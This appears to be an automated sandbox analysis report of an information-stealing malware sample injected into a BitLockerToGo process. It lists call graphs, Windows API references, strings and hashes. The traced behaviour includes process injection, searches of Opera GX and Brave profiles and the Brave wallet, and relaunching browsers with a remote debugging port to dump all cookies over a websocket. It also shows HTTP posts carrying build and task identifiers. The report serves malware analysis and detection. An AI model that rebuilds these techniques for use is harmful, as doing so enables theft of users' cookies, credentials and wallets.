2a121e9 lstrcpy 69564->69565 69566 2a06153 69565->69566 69567 2a12223 2 API calls 69566->69567 69568 2a06175 69567->69568 69569 2a121e9 lstrcpy 69568->69569 69570 2a06180 69569->69570 69571 2a12265 3 API calls 69570->69571 69572 2a061a1 69571->69572 69573 2a121e9 lstrcpy 69572->69573 69574 2a061ac 69573->69574 69575 2a12265 3 API calls 69574->69575 69576 2a061ce 69575->69576 69577 2a121e9 lstrcpy 69576->69577 69578 2a061d9 69577->69578 69579 2a12265 3 API 
calls 69578->69579 69580 2a061fb 69579->69580 69581 2a121e9 lstrcpy 69580->69581 69582 2a06206 69581->69582 69583 2a12265 3 API calls 69582->69583 69584 2a06227 69583->69584 69585 2a121e9 lstrcpy 69584->69585 69586 2a06232 69585->69586 69587 2a12223 2 API calls 69586->69587 69588 2a06251 69587->69588 69589 2a121e9 lstrcpy 69588->69589 69590 2a0625c 69589->69590 69591 2a12265 3 API calls 69590->69591 69592 2a0627d 69591->69592 69593 2a121e9 lstrcpy 69592->69593 69594 2a06288 69593->69594 69595 2a12265 3 API calls 69594->69595 69596 2a062a9 69595->69596 69597 2a121e9 lstrcpy 69596->69597 69598 2a062b4 69597->69598 69599 2a12223 2 API calls 69598->69599 69600 2a062d6 69599->69600 69601 2a121e9 lstrcpy 69600->69601 69602 2a062e1 69601->69602 69603 2a12265 3 API calls 69602->69603 69604 2a06302 69603->69604 69605 2a121e9 lstrcpy 69604->69605 69606 2a0630d 69605->69606 69607 2a12265 3 API calls 69606->69607 69608 2a0632f 69607->69608 69609 2a121e9 lstrcpy 69608->69609 69610 2a0633a 69609->69610 69611 2a12265 3 API calls 69610->69611 69612 2a0635b 69611->69612 69613 2a121e9 lstrcpy 69612->69613 69614 2a06366 69613->69614 69615 2a12265 3 API calls 69614->69615 69616 2a06387 69615->69616 69617 2a121e9 lstrcpy 69616->69617 69618 2a06392 69617->69618 69619 2a12265 3 API calls 69618->69619 69620 2a063b3 69619->69620 69621 2a121e9 lstrcpy 69620->69621 69622 2a063be 69621->69622 69623 2a12265 3 API calls 69622->69623 69624 2a063df 69623->69624 69625 2a121e9 lstrcpy 69624->69625 69626 2a063ea 69625->69626 69627 2a12265 3 API calls 69626->69627 69628 2a0640b 69627->69628 69629 2a121e9 lstrcpy 69628->69629 69630 2a06416 69629->69630 69631 2a12223 2 API calls 69630->69631 69632 2a06432 69631->69632 69633 2a121e9 lstrcpy 69632->69633 69634 2a0643d 69633->69634 69635 2a12265 3 API calls 69634->69635 69636 2a0645e 69635->69636 69637 2a121e9 lstrcpy 69636->69637 69638 2a06469 69637->69638 69639 2a12265 3 API calls 69638->69639 69640 2a0648b 69639->69640 69641 2a121e9 lstrcpy 
69640->69641 69642 2a06496 69641->69642 69643 2a12265 3 API calls 69642->69643 69644 2a064b7 69643->69644 69645 2a121e9 lstrcpy 69644->69645 69646 2a064c2 69645->69646 69647 2a12265 3 API calls 69646->69647 69648 2a064e3 69647->69648 69649 2a121e9 lstrcpy 69648->69649 69650 2a064ee 69649->69650 69651 2a12223 2 API calls 69650->69651 69652 2a0650d 69651->69652 69653 2a121e9 lstrcpy 69652->69653 69654 2a06518 69653->69654 69655 2a06523 lstrlen lstrlen GetProcessHeap RtlAllocateHeap lstrlen 69654->69655 70353 2a288d0 69655->70353 69658 2a288d0 _memmove 69659 2a06592 lstrlen HttpSendRequestA 69658->69659 69660 2a06601 InternetReadFile 69659->69660 69661 2a06620 InternetCloseHandle 69660->69661 69663 2a065c2 69660->69663 69661->69559 69662 2a12265 3 API calls 69662->69663 69663->69660 69663->69661 69663->69662 69664 2a121e9 lstrcpy 69663->69664 69664->69663 69666 2a151f1 69665->69666 69669 2a15176 69665->69669 69666->68479 69667 2a121a5 2 API calls 69668 2a151d7 strtok_s 69667->69668 69668->69666 69668->69669 69669->69667 69669->69668 69670 2a121a5 2 API calls 69669->69670 69670->69669 69674 2a14ed4 69671->69674 69672 2a14fd3 69672->68487 69673 2a14f80 StrCmpCA 69673->69674 69674->69672 69674->69673 69675 2a121a5 2 API calls 69674->69675 69676 2a14fb5 strtok_s 69674->69676 69677 2a14f4f StrCmpCA 69674->69677 69678 2a14f2a StrCmpCA 69674->69678 69679 2a14ef9 StrCmpCA 69674->69679 69675->69674 69676->69674 69677->69674 69678->69674 69679->69674 69681 2a15083 69680->69681 69686 2a1500b 69680->69686 69681->68495 69682 2a121a5 2 API calls 69684 2a15069 strtok_s 69682->69684 69683 2a15031 StrCmpCA 69683->69686 69684->69681 69684->69686 69685 2a121a5 2 API calls 69685->69686 69686->69682 69686->69683 69686->69684 69686->69685 69688 2a12143 lstrcpy 69687->69688 69689 2a158dc 69688->69689 69690 2a12265 3 API calls 69689->69690 69691 2a158ec 69690->69691 69692 2a121e9 lstrcpy 69691->69692 69693 2a158f4 69692->69693 69694 2a12265 3 API calls 69693->69694 69695 2a1590c 69694->69695 
69696 2a121e9 lstrcpy 69695->69696 69697 2a15914 69696->69697 69698 2a12265 3 API calls 69697->69698 69699 2a1592c 69698->69699 69700 2a121e9 lstrcpy 69699->69700 69701 2a15934 69700->69701 69702 2a12265 3 API calls 69701->69702 69703 2a1594c 69702->69703 69704 2a121e9 lstrcpy 69703->69704 69705 2a15954 69704->69705 69706 2a12265 3 API calls 69705->69706 69707 2a1596c 69706->69707 69708 2a121e9 lstrcpy 69707->69708 69709 2a15974 69708->69709 70359 2a1291c GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 69709->70359 69712 2a12265 3 API calls 69713 2a1598d 69712->69713 69714 2a121e9 lstrcpy 69713->69714 69715 2a15995 69714->69715 69716 2a12265 3 API calls 69715->69716 69717 2a159ad 69716->69717 69718 2a121e9 lstrcpy 69717->69718 69719 2a159b5 69718->69719 69720 2a12265 3 API calls 69719->69720 69721 2a159cd 69720->69721 69722 2a121e9 lstrcpy 69721->69722 69723 2a159d5 69722->69723 70362 2a13230 69723->70362 69726 2a12265 3 API calls 69727 2a159ee 69726->69727 69728 2a121e9 lstrcpy 69727->69728 69729 2a159f6 69728->69729 69730 2a12265 3 API calls 69729->69730 69731 2a15a0e 69730->69731 69732 2a121e9 lstrcpy 69731->69732 69733 2a15a16 69732->69733 69734 2a12265 3 API calls 69733->69734 69735 2a15a2e 69734->69735 69736 2a121e9 lstrcpy 69735->69736 69737 2a15a36 69736->69737 69738 2a132e0 11 API calls 69737->69738 69739 2a15a46 69738->69739 69740 2a12223 2 API calls 69739->69740 69741 2a15a53 69740->69741 69742 2a121e9 lstrcpy 69741->69742 69743 2a15a5b 69742->69743 69744 2a12265 3 API calls 69743->69744 69745 2a15a7b 69744->69745 69746 2a121e9 lstrcpy 69745->69746 69747 2a15a83 69746->69747 69748 2a12265 3 API calls 69747->69748 69749 2a15a9b 69748->69749 69750 2a121e9 lstrcpy 69749->69750 69751 2a15aa3 69750->69751 69752 2a125fe 19 API calls 69751->69752 69753 2a15ab3 69752->69753 69754 2a12223 2 API calls 69753->69754 69755 2a15ac0 69754->69755 69756 2a121e9 lstrcpy 69755->69756 69757 2a15ac8 69756->69757 69758 2a12265 3 API calls 69757->69758 69759 2a15ae8 
69758->69759 69760 2a121e9 lstrcpy 69759->69760 69761 2a15af0 69760->69761 69762 2a12265 3 API calls 69761->69762 69763 2a15b08 69762->69763 69764 2a121e9 lstrcpy 69763->69764 69765 2a15b10 69764->69765 69766 2a15b18 GetCurrentProcessId 69765->69766 70369 2a13ee1 OpenProcess 69766->70369 69769 2a12223 2 API calls 69770 2a15b35 69769->69770 69771 2a121e9 lstrcpy 69770->69771 69772 2a15b3d 69771->69772 69773 2a12265 3 API calls 69772->69773 69774 2a15b5d 69773->69774 69775 2a121e9 lstrcpy 69774->69775 69776 2a15b65 69775->69776 69777 2a12265 3 API calls 69776->69777 69778 2a15b7d 69777->69778 69779 2a121e9 lstrcpy 69778->69779 69780 2a15b85 69779->69780 69781 2a12265 3 API calls 69780->69781 69782 2a15b9d 69781->69782 69783 2a121e9 lstrcpy 69782->69783 69784 2a15ba5 69783->69784 69785 2a12265 3 API calls 69784->69785 69786 2a15bbd 69785->69786 69787 2a121e9 lstrcpy 69786->69787 69788 2a15bc5 69787->69788 70376 2a1278c GetProcessHeap RtlAllocateHeap 69788->70376 69791 2a12265 3 API calls 69792 2a15bde 69791->69792 69793 2a121e9 lstrcpy 69792->69793 69794 2a15be6 69793->69794 69795 2a12265 3 API calls 69794->69795 69796 2a15bfe 69795->69796 69797 2a121e9 lstrcpy 69796->69797 69798 2a15c06 69797->69798 69799 2a12265 3 API calls 69798->69799 69800 2a15c1e 69799->69800 69801 2a121e9 lstrcpy 69800->69801 69802 2a15c26 69801->69802 70383 2a13463 69802->70383 69805 2a12223 2 API calls 69806 2a15c43 69805->69806 69807 2a121e9 lstrcpy 69806->69807 69808 2a15c4b 69807->69808 69809 2a12265 3 API calls 69808->69809 69810 2a15c6b 69809->69810 69811 2a121e9 lstrcpy 69810->69811 69812 2a15c73 69811->69812 69813 2a12265 3 API calls 69812->69813 69814 2a15c8b 69813->69814 69815 2a121e9 lstrcpy 69814->69815 69816 2a15c93 69815->69816 70400 2a135f3 69816->70400 69818 2a15ca4 69819 2a12223 2 API calls 69818->69819 69820 2a15cb2 69819->69820 69821 2a121e9 lstrcpy 69820->69821 69822 2a15cba 69821->69822 69823 2a12265 3 API calls 69822->69823 69824 2a15cda 69823->69824 69825 2a121e9 lstrcpy 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
• Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
• Opcode ID: 306d5bb266e47852d2ea6910145821d77c9279220e454c58d5481ae9fbd506d5
• Instruction ID: 7709b8895527d6cf7d1deabecd9f58a25e0a79420b01b3a1b66fe64b52761cda
• Opcode Fuzzy Hash: 306d5bb266e47852d2ea6910145821d77c9279220e454c58d5481ae9fbd506d5
• Instruction Fuzzy Hash: B852F97DCC0241EFDB1A9F61EE4AB263AF2F7082153054B25FE9591224D77258B0EF62

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
APIs
  • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
  • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
  • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
  • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
  • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
  • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
  • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
• FindFirstFileA.KERNEL32(?,?,02A3786B,02A3786A,02A38464,02A37867,?,?,?), ref: 02A0A9EB
• StrCmpCA.SHLWAPI(?,02A38468), ref: 02A0AA13
• StrCmpCA.SHLWAPI(?,02A3846C), ref: 02A0AA2D
  • Part of subcall function 02A121A5: lstrlen.KERNEL32(?,?,02A19098,02A377FE,02A37787,?,?,?,?,02A19D6E), ref: 02A121AB
  • Part of subcall function 02A121A5: lstrcpy.KERNEL32(00000000,00000000), ref: 02A121DD
• StrCmpCA.SHLWAPI(?,Opera GX,02A38470,?,02A3786E), ref: 02A0AABF
• StrCmpCA.SHLWAPI(?,Brave,02A38490,02A38494,02A38470,?,02A3786E), ref: 02A0AC41
• StrCmpCA.SHLWAPI(?,Preferences), ref: 02A0AC5B
• CopyFileA.KERNEL32(?,?,00000001), ref: 02A0AD1B
• DeleteFileA.KERNEL32(?), ref: 02A0ADEA
• StrCmpCA.SHLWAPI(?), ref: 02A0AE28
• StrCmpCA.SHLWAPI(?), ref: 02A0AE92
• StrCmpCA.SHLWAPI(02A0DCCC), ref: 02A0AEA9
• CopyFileA.KERNEL32(?,?,00000001), ref: 02A0AFA1
  • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
  • Part of subcall function 02A140F6: _memset.LIBCMT ref: 02A1411D
  • Part of subcall function 02A140F6: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 02A141C3
  • Part of subcall function 02A140F6: TerminateProcess.KERNEL32(00000000,00000000), ref: 02A141D1
  • Part of subcall function 02A140F6: CloseHandle.KERNEL32(00000000), ref: 02A141D8
• _memset.LIBCMT ref: 02A0B03F
• lstrcat.KERNEL32(?,?), ref: 02A0B051
• lstrcat.KERNEL32(?,?), ref: 02A0B061
• _memset.LIBCMT ref: 02A0B251
• lstrcat.KERNEL32(?,?), ref: 02A0B263
• lstrcat.KERNEL32(?,?), ref: 02A0B273
• lstrcat.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 02A0B285
• StrCmpCA.SHLWAPI(?), ref: 02A0B2D3
• CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B393
  • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
  • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
  • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
  • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
  • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
• DeleteFileA.KERNEL32(?), ref: 02A0B43E
  • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
  • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
• StrCmpCA.SHLWAPI(?), ref: 02A0B46F
• lstrcat.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 02A0B073
  • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
• CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B1B8
• CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B52F
• DeleteFileA.KERNEL32(?), ref: 02A0B5C9
• FindNextFileA.KERNEL32(?,?), ref: 02A0B6A7
• FindClose.KERNEL32(?), ref: 02A0B6BB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: File$lstrcat$lstrcpy$Copy$CloseDeleteFind_memset$CreateHandleProcesslstrlen$AllocFirstLocalNextObjectOpenReadSingleSizeSystemTerminateThreadTimeWait
• String ID: --remote-debugging-port=9223 --profile-directory="$ --remote-debugging-port=9223 --profile-directory="$Brave$Opera GX$Preferences$\BraveWallet\Preferences$_cookies.db$_cookies.db$_webdata.db

Control-flow Graph

[Figure: control-flow graph of the function starting at 02A06AE1, with nodes marked as executed or not executed]
APIs
  • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
  • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
  • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
  • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
  • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
  • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
  • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
• InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A06B80
• StrCmpCA.SHLWAPI(?), ref: 02A06B9E
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A06D36
• HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A06D7A
• lstrlen.KERNEL32(?,",status,02A38B60,------,02A38B54,",task_id,02A38B40,------,02A38B34,",mode,02A38B20,------,02A38B14), ref: 02A0746C
• lstrlen.KERNEL32(?), ref: 02A0747B
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A07485
• RtlAllocateHeap.NTDLL(00000000), ref: 02A0748C
• lstrlen.KERNEL32(?), ref: 02A07499
• _memmove.LIBCMT ref: 02A074A7
• lstrlen.KERNEL32(?), ref: 02A074B5
• lstrlen.KERNEL32(?,?,00000000), ref: 02A074C3
• _memmove.LIBCMT ref: 02A074D0
• lstrlen.KERNEL32(?,?,00000000), ref: 02A074E5
• HttpSendRequestA.WININET(?,?,00000000), ref: 02A074F8
• InternetReadFile.WININET(?,?,000000C7,?), ref: 02A07559
• InternetCloseHandle.WININET(?), ref: 02A07569
• InternetCloseHandle.WININET(?), ref: 02A07575
• InternetCloseHandle.WININET(?), ref: 02A07587
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06DAC
  • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
  • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
  • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
  • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
  • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
  • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
Strings
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Yara matches
Similarity
• API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocateConnectCrackFileOptionProcessReadSend
• String ID: "$"$"$"$"$------$------$------$------$------$------$27536a38d3707b6600f28b9d7177a12c$build_id$mode$status$task_id

Control-flow Graph

[Figure: control-flow graph of the function starting at 02A07FAB, with nodes marked as executed or not executed]
1349 2a0859c-2a085cf call 2a102aa rand 1345->1349 1347 2a08544-2a0856b call 2a0ff15 call 2a1045e * 2 1346->1347 1347->1247 1348->1347 1355 2a085d1-2a085d7 1349->1355 1356 2a085d8-2a085e5 rand 1349->1356 1355->1356 1358 2a085e7-2a085ed 1356->1358 1359 2a085ee-2a085fb rand 1356->1359 1358->1359 1360 2a08604-2a08611 rand 1359->1360 1361 2a085fd-2a08603 1359->1361 1363 2a08613-2a08619 1360->1363 1364 2a0861a-2a08648 call 2a10250 1360->1364 1361->1360 1363->1364 1368 2a08658-2a08664 1364->1368 1369 2a0864a-2a08656 1364->1369 1371 2a08686-2a08695 call 2a10250 1368->1371 1372 2a08666-2a08678 call 2a10250 * 2 1368->1372 1370 2a08679-2a08684 call 2a10250 1369->1370 1379 2a086b9-2a086d2 call 2a0ff70 1370->1379 1380 2a08696-2a086b7 call 2a30a00 call 2a10250 1371->1380 1372->1370 1388 2a086d4-2a086e1 1379->1388 1389 2a0870c-2a08719 1379->1389 1380->1379 1393 2a086e3 1388->1393 1394 2a086e9-2a0870a call 2a10250 1388->1394 1390 2a08721-2a0873a send 1389->1390 1391 2a0871b 1389->1391 1395 2a0873c-2a0877a closesocket WSACleanup call 2a0ff15 call 2a1045e * 2 1390->1395 1396 2a0877f-2a087a8 1390->1396 1391->1390 1393->1394 1394->1388 1394->1389 1395->1396 1400 2a087af-2a087ca recv 1396->1400 1402 2a087d0-2a087f6 call 2a109d0 1400->1402 1403 2a089d7-2a08a10 call 2a10250 * 2 1400->1403 1410 2a0899d-2a089b4 1402->1410 1419 2a08a12 1403->1419 1420 2a08a14-2a08a49 send closesocket WSACleanup 1403->1420 1415 2a089ba 1410->1415 1416 2a087fb-2a0882c 1410->1416 1421 2a089c8-2a089d1 1415->1421 1417 2a0885e-2a08861 1416->1417 1418 2a0882e-2a08830 1416->1418 1423 2a08863-2a08865 1417->1423 1424 2a088b4-2a088c0 1417->1424 1418->1417 1422 2a08832-2a08839 1418->1422 1419->1420 1425 2a08a51-2a08a5e 1420->1425 1426 2a08a4b 1420->1426 1421->1400 1421->1403 1422->1421 1427 2a0883f-2a0885c 1422->1427 1423->1424 1428 2a08867-2a0886e 1423->1428 1431 2a088c2-2a088cb 1424->1431 1432 2a088dc-2a088f0 1424->1432 1429 2a08a60 1425->1429 1430 2a08a66-2a08abb call 2a108de call 2a10151 call 2a1045e * 3 call 
2a104d8 1425->1430 1426->1425 1427->1424 1428->1421 1433 2a08874-2a0887a 1428->1433 1429->1430 1430->1239 1431->1421 1435 2a088d1-2a088da 1431->1435 1432->1421 1436 2a088f6 1432->1436 1439 2a08880-2a088ac 1433->1439 1435->1432 1437 2a08904-2a08917 call 2a108a7 1436->1437 1438 2a088f8-2a088fe 1436->1438 1445 2a0891c-2a08929 1437->1445 1438->1421 1438->1437 1439->1439 1442 2a088ae 1439->1442 1442->1424 1447 2a08955-2a08996 call 2a10b24 call 2a100e9 1445->1447 1448 2a0892b-2a0893b 1445->1448 1459 2a08998 call 2a104d8 1447->1459 1460 2a089bc-2a089c3 call 2a104d8 1447->1460 1448->1447 1450 2a0893d-2a08953 1448->1450 1450->1447 1450->1450 1459->1410 1460->1421
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10532: std::_Xinvalid_argument.LIBCPMT ref: 02A1054B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1045E: _memmove.LIBCMT ref: 02A10478
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A102CD: memchr.MSVCRT ref: 02A10336
                                                                                                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 02A08241
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10532: _memmove.LIBCMT ref: 02A1059D
                                                                                                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 02A0825D
                                                                                                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 02A0826E
                                                                                                                                                                                                                                                                                                                                                          • getaddrinfo.WS2_32(?,00000000,?,?), ref: 02A082CD
                                                                                                                                                                                                                                                                                                                                                          • closesocket.WS2_32(?), ref: 02A082DD
                                                                                                                                                                                                                                                                                                                                                          • WSACleanup.WS2_32 ref: 02A082E3
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • HTTP/1.1Host: , xrefs: 02A083AB
                                                                                                                                                                                                                                                                                                                                                          • Sec-WebSocket-Version: 13, xrefs: 02A0847A
                                                                                                                                                                                                                                                                                                                                                          • :, xrefs: 02A0816B
                                                                                                                                                                                                                                                                                                                                                          • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 02A08435
                                                                                                                                                                                                                                                                                                                                                          • ws://, xrefs: 02A08055
                                                                                                                                                                                                                                                                                                                                                          • {"id":1,"method":"Network.getAllCookies"}, xrefs: 02A0859F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Cleanup_memmove$StartupXinvalid_argumentclosesocketgetaddrinfomemchrsocketstd::_
                                                                                                                                                                                                                                                                                                                                                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Network.getAllCookies"}
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2519114892-1552268179
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A16A59
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 02A16A70
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16A8C
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A16A9D
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37A38), ref: 02A16ABE
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37A3C), ref: 02A16AD8
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A16AFF
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3766E), ref: 02A16B13
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A16B3C
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A16B53
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
